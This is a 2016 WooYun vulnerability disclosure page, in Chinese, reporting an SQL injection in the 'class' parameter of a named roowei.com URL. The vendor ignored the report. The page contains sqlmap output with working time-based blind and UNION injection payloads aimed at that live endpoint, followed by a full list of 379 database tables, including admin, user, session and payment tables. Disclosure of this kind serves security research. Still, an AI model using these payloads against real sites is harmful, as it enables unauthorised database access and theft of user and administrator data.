当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0178678

漏洞标题:入围网主站存在SQL注入漏洞可UNION

相关厂商:roowei.com

漏洞作者: 路人甲

提交时间:2016-02-26 12:12

修复时间:2016-03-02 12:20

公开时间:2016-03-02 12:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-26: 细节已通知厂商并且等待厂商处理中
2016-03-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://www.roowei.com/js/Album.js.php?action=Select_album&class=0&diqu=0&limit=7

5.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: class (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=Select_album&class=0) AND (SELECT * FROM (SELECT(SLEEP(5)))SVlA) AND (9229=9229&diqu=0&limit=7
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: action=Select_album&class=0) UNION ALL SELECT NULL,CONCAT(0x716b767a71,0x45666263565575454c75,0x7178716271),NULL,NULL,NULL-- &diqu=0&limit=7
---
web application technology: PHP 5.5.14
back-end DBMS: MySQL >= 5.0.0
Database: roowei
[379 tables]
+---------------------------------+
| sl_admin |
| sl_admin_ads |
| sl_admin_ads_manage |
| sl_admin_ads_new |
| sl_admin_ads_page |
| sl_admin_ads_type_manage |
| sl_admin_article |
| sl_admin_articlehits |
| sl_admin_articlemycat |
| sl_admin_articlepage |
| sl_admin_industry_ads |
| sl_admin_industry_webseo |
| sl_admin_web_page |
| sl_adminfailedlogin |
| sl_admingroup |
| sl_admingroupmap |
| sl_adminoperlog |
| sl_adminsection |
| sl_album_user |
| sl_backsession |
| sl_cacheback |
| sl_cachefront |
| sl_cachesearchback |
| sl_cachesearchfront |
| sl_ci_sessions |
| sl_cn_ads |
| sl_cn_ads1 |
| sl_cn_ads_industry |
| sl_cn_ads_new |
| sl_cn_advertising |
| sl_cn_advertising2 |
| sl_cn_advertising_industry |
| sl_cn_advertising_new |
| sl_cn_album |
| sl_cn_article |
| sl_cn_article1 |
| sl_cn_article1_content |
| sl_cn_article1_count |
| sl_cn_article_index |
| sl_cn_article_index_category |
| sl_cn_article_index_content |
| sl_cn_article_index_count |
| sl_cn_articlecatadgrmap |
| sl_cn_articlecategory |
| sl_cn_articlecatusgrmap |
| sl_cn_articlecomment |
| sl_cn_articlecontribution |
| sl_cn_articlecounter |
| sl_cn_articlehits |
| sl_cn_articleimg |
| sl_cn_articleimg_copy |
| sl_cn_articlemycat |
| sl_cn_articlemycomment |
| sl_cn_articlepage |
| sl_cn_articlepage1 |
| sl_cn_classinfo |
| sl_cn_classinfo1 |
| sl_cn_classinfo_adminpush |
| sl_cn_classinfo_attr |
| sl_cn_classinfo_attr_value |
| sl_cn_classinfo_category |
| sl_cn_classinfo_comment1 |
| sl_cn_classinfo_content |
| sl_cn_classinfo_count |
| sl_cn_classinfo_favorite |
| sl_cn_classinfo_jobmap |
| sl_cn_classinfo_list |
| sl_cn_classinfo_old_data |
| sl_cn_classinfo_order |
| sl_cn_classinfo_template |
| sl_cn_classinfo_xphoto |
| sl_cn_classinfoattr |
| sl_cn_classinfocatadgmap |
| sl_cn_classinfocatattrelement |
| sl_cn_classinfocatgeory |
| sl_cn_classinfocatusgmap |
| sl_cn_classinfomember |
| sl_cn_comment |
| sl_cn_count |
| sl_cn_custom_navigate |
| sl_cn_domain |
| sl_cn_feedback |
| sl_cn_feedbacktadgmap |
| sl_cn_feedbacktusgmap |
| sl_cn_feedbacktype |
| sl_cn_friendly_link |
| sl_cn_gallery_album |
| sl_cn_gallery_picture |
| sl_cn_goods |
| sl_cn_goodscatadgrmap |
| sl_cn_goodscategory |
| sl_cn_goodscatusgrmap |
| sl_cn_goodscomment |
| sl_cn_goodsconsignee |
| sl_cn_goodscounter |
| sl_cn_goodsmycomment |
| sl_cn_goodsorder |
| sl_cn_goodsordergoods |
| sl_cn_hweb_hist |
| sl_cn_indexs |
| sl_cn_indexs_1 |
| sl_cn_indexs_copy1 |
| sl_cn_industrie_manage |
| sl_cn_industrie_nav |
| sl_cn_industry_admin |
| sl_cn_industry_ads_seat |
| sl_cn_industry_ads_trade |
| sl_cn_industry_advertise |
| sl_cn_industry_album |
| sl_cn_industry_company |
| sl_cn_industry_company_mycat |
| sl_cn_industry_picture |
| sl_cn_industry_recharge_record |
| sl_cn_industry_website |
| sl_cn_infor_rule |
| sl_cn_menu |
| sl_cn_message |
| sl_cn_module |
| sl_cn_module_choose |
| sl_cn_module_choose_custom_text |
| sl_cn_module_manage |
| sl_cn_navigate |
| sl_cn_navigate_mark |
| sl_cn_payment |
| sl_cn_photo |
| sl_cn_poll |
| sl_cn_polloption |
| sl_cn_product |
| sl_cn_product_content |
| sl_cn_product_count |
| sl_cn_product_index |
| sl_cn_product_index_category |
| sl_cn_product_index_content |
| sl_cn_product_index_count |
| sl_cn_quick |
| sl_cn_router_auth_logs |
| sl_cn_router_auth_page |
| sl_cn_router_info |
| sl_cn_router_user |
| sl_cn_site |
| sl_cn_sms_order |
| sl_cn_staticcontent |
| sl_cn_template |
| sl_cn_territory |
| sl_cn_tools |
| sl_cn_tools_count |
| sl_cn_tradebuyvip |
| sl_cn_tradecertificate |
| sl_cn_tradecompany |
| sl_cn_tradecompanyseo |
| sl_cn_tradecorpindmap |
| sl_cn_tradedomainname |
| sl_cn_tradefavoritejobad |
| sl_cn_tradefavoritejobseeker |
| sl_cn_tradeindadgmap |
| sl_cn_tradeindattrelement |
| sl_cn_tradeindusgmap |
| sl_cn_tradeindustry |
| sl_cn_tradeindustry_data |
| sl_cn_tradeinfo |
| sl_cn_tradeinfo2 |
| sl_cn_tradeinfo_content |
| sl_cn_tradeinfoattr |
| sl_cn_tradeinfotype |
| sl_cn_tradejobads |
| sl_cn_tradejobcategory |
| sl_cn_tradejobmap |
| sl_cn_tradejobseeker |
| sl_cn_tradelink |
| sl_cn_trademessage |
| sl_cn_trademyproduct |
| sl_cn_trademyproductcat |
| sl_cn_tradeprocontri |
| sl_cn_tradeproduct |
| sl_cn_tradeproduct_content |
| sl_cn_tradeproductattr |
| sl_cn_tradeproducthist |
| sl_cn_user_ads |
| sl_cn_user_hits |
| sl_cn_user_manageads |
| sl_cn_user_orderads |
| sl_cn_user_quick |
| sl_cn_usertools |
| sl_cn_video |
| sl_cn_videoblog |
| sl_cn_videocatadgrmap |
| sl_cn_videocategory |
| sl_cn_videocatusgrmap |
| sl_cn_videocomment |
| sl_cn_videocontribution |
| sl_cn_videocounter |
| sl_cn_videomycat |
| sl_cn_videomycomment |
| sl_cn_videopage |
| sl_cn_web |
| sl_cn_web_copy |
| sl_cn_web_hist |
| sl_cn_web_industry |
| sl_cn_webpage |
| sl_cn_webpageblock |
| sl_cn_webpagetype |
| sl_cn_webseo |
| sl_cn_weisite_adv |
| sl_cn_weisite_adv_content |
| sl_cn_weisite_adv_count_201503 |
| sl_cn_weisite_adv_count_201504 |
| sl_cn_weisite_adv_count_201507 |
| sl_cn_weisite_adv_count_201602 |
| sl_cn_weisite_adv_count_main |
| sl_cn_weisite_article |
| sl_cn_weisite_article_content |
| sl_cn_weisite_consum_level |
| sl_cn_weisite_custom_category |
| sl_cn_weisite_custom_column |
| sl_cn_weisite_custom_view |
| sl_cn_weisite_industry_class |
| sl_cn_weisite_info |
| sl_cn_weisite_tpl |
| sl_cn_wifi_auth_count |
| sl_cn_wifi_auth_count_201503 |
| sl_cn_wifi_auth_count_201504 |
| sl_cn_wifi_auth_count_main |
| sl_cn_wifi_auth_page |
| sl_cn_wifi_router_auth_logs |
| sl_cn_wifi_router_info |
| sl_cn_wifi_router_user |
| sl_cn_wifi_sms_log |
| sl_cn_wifi_sms_tpl |
| sl_cn_wifi_template |
| sl_cn_wifi_value_add |
| sl_cn_xfphoto |
| sl_content_page |
| sl_cron |
| sl_cuxiao |
| sl_defaulttemp |
| sl_du_bborder |
| sl_du_bcrelation |
| sl_du_border |
| sl_du_content |
| sl_du_content_1 |
| sl_du_layout |
| sl_du_module |
| sl_du_proportion |
| sl_emotion |
| sl_frontsession |
| sl_goods_ads |
| sl_goods_adsadmin |
| sl_goods_advertising |
| sl_goods_album |
| sl_goods_album_pic |
| sl_goods_album_pic_count |
| sl_goods_article |
| sl_goods_attribute |
| sl_goods_attribute_rule |
| sl_goods_attribute_value |
| sl_goods_brand |
| sl_goods_brand_class |
| sl_goods_category |
| sl_goods_category_class |
| sl_goods_category_staple |
| sl_goods_collection |
| sl_goods_custom_category |
| sl_goods_default_logistics |
| sl_goods_delivery_address |
| sl_goods_feedback |
| sl_goods_link |
| sl_goods_logistics |
| sl_goods_map |
| sl_goods_member_level |
| sl_goods_money_back |
| sl_goods_navadmin |
| sl_goods_order |
| sl_goods_order_pro |
| sl_goods_payment |
| sl_goods_product |
| sl_goods_product_attr |
| sl_goods_product_close |
| sl_goods_product_content |
| sl_goods_product_count |
| sl_goods_product_pic |
| sl_goods_product_spec |
| sl_goods_product_storage |
| sl_goods_ship |
| sl_goods_ship_address |
| sl_goods_shop_cart |
| sl_goods_spec |
| sl_goods_spec_value |
| sl_goods_store |
| sl_goods_storeinfo |
| sl_goods_stroenav |
| sl_goods_template_admin |
| sl_goods_tpladmin |
| sl_goods_type |
| sl_goods_type_brand |
| sl_goods_type_spec |
| sl_goods_uidtourl |
| sl_goods_video_list |
| sl_goods_weiquan |
| sl_inadmin_cuxiao |
| sl_industry_dress_template |
| sl_industry_module |
| sl_industry_template |
| sl_industry_video_list |
| sl_instance |
| sl_keyword |
| sl_manage_admin_details |
| sl_manage_admins |
| sl_manage_auth |
| sl_manage_auth_module |
| sl_manage_auth_rights |
| sl_manage_controllers |
| sl_manage_cpage |
| sl_member_dress_template |
| sl_member_industry |
| sl_member_layout |
| sl_member_module |
| sl_member_module_style |
| sl_member_template |
| sl_mess |
| sl_na_ads_admin |
| sl_na_ads_trade |
| sl_na_advertising |
| sl_na_advertising_price |
| sl_na_advertising_type |
| sl_na_member |
| sl_na_member_field |
| sl_na_role |
| sl_na_store_grade |
| sl_na_storegrade_order |
| sl_newscontent |
| sl_oauth |
| sl_operator |
| sl_operator_field |
| sl_operators_order |
| sl_page |
| sl_qq |
| sl_role |
| sl_role_module |
| sl_role_project |
| sl_setting |
| sl_site_type |
| sl_tml |
| sl_trade_ads |
| sl_user |
| sl_user_autologin |
| sl_user_code |
| sl_user_config |
| sl_user_error |
| sl_user_forgetpassword |
| sl_user_grade |
| sl_user_oem |
| sl_user_oemlist |
| sl_user_publish_count |
| sl_user_templates |
| sl_user_upgrade |
| sl_userextra |
| sl_usergroup |
| sl_usergroupmap |
| sl_usersection |
| sl_video |
| sl_video_list |
| sl_web_class |
| sl_web_r_page |
| sl_web_shenghuo |
| sl_webp_class |
| sl_website_setting |
| sl_weicode |
| sl_wx_autoreply |
| sl_wx_menu |
| sl_wx_owneruser |
| sl_wx_thesaurus |
| sl_wx_user |
| sl_yy_admin |
| sl_yy_module |
| sl_yy_modulegroup |
| sl_yy_role |
| sl_yy_usermodule |
| sl_yy_userrole |
| users |
+---------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-02 12:20

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无